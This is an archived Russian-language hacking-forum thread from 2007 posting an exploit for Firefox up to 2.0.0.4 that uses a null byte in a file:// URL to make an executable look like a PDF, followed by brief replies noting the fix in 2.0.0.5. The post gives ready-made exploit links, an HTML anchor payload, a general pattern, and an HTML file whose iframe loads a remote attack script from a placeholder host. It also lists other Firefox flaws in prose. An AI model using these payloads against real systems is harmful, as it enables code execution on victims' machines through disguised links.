PDA

Просмотр полной версии : Mozilla Firefox URLBar: выполнение произвольного кода.


-=lebed=-
24.07.2007, 10:30
Mozilla Firefox URLBar: выполнение произвольного кода.
автор: 0х00000000
www.0x000000.com/?i=333

Цель: Mozilla Firefox практически всех версий. <=2.0.0.4

Опасность: 4/10

Exploit:
В строке URL пишем:

file:///C:/winnt/system32/calc.exe%00.pdf

или в теле html-документа используем ссылку вида:

<A HREF=file:///C:/winnt/system32/calc.exe%00.pdf>download</A>

Общий вид эксплоита: [uri]/[filelocation]/[file][.ext1]%00[.ext2] - где между расширениями файла ext1 и ext2 вставлен терминирующий символ "%00" (нулевой байт - признак конца строки).

Подробности:
При открытии вредоносной ссылки Огненный Лис запутывается: он распознаёт этот файл как приложение (о чём честно пишет вверху) а ниже предлагает открыть этот файл как pdf-документ.
http://lebed.ucoz.ru/images/bug_ff.png
Если уязвимое приложение самостоятельно сопоставляет тип файла с обрабатывающем приложением, то при попытке открытия файла calc.exe%00.pdf запустится, например Acrobat Reader и попробует открыть файл calc.exe, что у него естественно не получиться и вместо захвата управления мы увидим сообщение Акробата о не верном формате файла. А вот если файл открывается API-функциями ShellExecute/ShellExecuteEx, то сопаставление типа и расширения ложиться на плечи операционной системы и она послушно запускает calc.exe.
Тут открываются возможности по выполнению произвольного javascript-сценария: например так:

file:///path/troy.txt%00.html

а файл troy.txt%00.html может содержать например такой html-код:

<html>
<iframe name="bla" src="http://www.you_site.com/hacks/?troy.js" width="100%" height="900"></iframe>
</html>


Защита: Внимательно смотрите на раширения файлов перед открытием.

ЗЫ: Другие уязвимости FF:

Найденные уязвимости позволяют удаленному злоумышленнику обойти ограничения безопасности, выполнить произвольный код, осуществить XSS атаку, произвести DoS атаку и атаку спуфинга.

1) Уязвимость возникает из-за множественных ошибок в движке браузера. Эксплуатирование уязвимости приведет к порче участков памяти и выполнению произвольного кода.
2) Уязвимость возникает из-за множественных ошибок в движке Javascript. Эксплуатирование уязвимости приведет к порче участков памяти и выполнению произвольного кода.
3) Уязвимость возникает из-за ошибки в методах "addEventListener" и "setTimeout". Эксплуатирование уязвимости приведет к обходу политик безопасности браузера и выполнению сценария в контексте другого сайта.
4) Уязвимость возникает из-за ошибки междоменной (cross-domain) обработки. Эксплуатирование уязвимости приведет к вставке произвольного сценария в sub-frame другого Web сайта.
5) Уязвимость возникает из-за ошибки в обработке элементов внешних документов. Атакующий может вызвать обработчик событий и выполнить произвольный код с привилегиями chrome.
6) Уязвимость возникает из-за ошибки в обработке "XPCNativeWrapper" Атакующий может выполнить произвольный код
за подробностями на bugtrack.ru

kot777
24.07.2007, 10:52
Уязвима только 2.0.0.4, в 2.0.0.5 уже фикс.

Isis
24.07.2007, 10:53
Мде...неплохо
Для каких версий фф?

c411k
24.07.2007, 20:30
Мде...неплохо
Для каких версий фф?
мдя, ты только первых 5 слов прочитал в названии темы чтоли?
Уязвима только 2.0.0.4, в 2.0.0.5 уже фикс.

Isis
29.07.2007, 09:54
c411k,
Последний раз редактировалось -=lebed=-, 24.07.2007 в 11:11.
Ниче так , да?

Zedobat
29.07.2007, 11:48
Ну а что собственно удивляться. Вышла новая версия, и выкладывают дыры в старой. Так было и будет всегда, и не только для ФФ.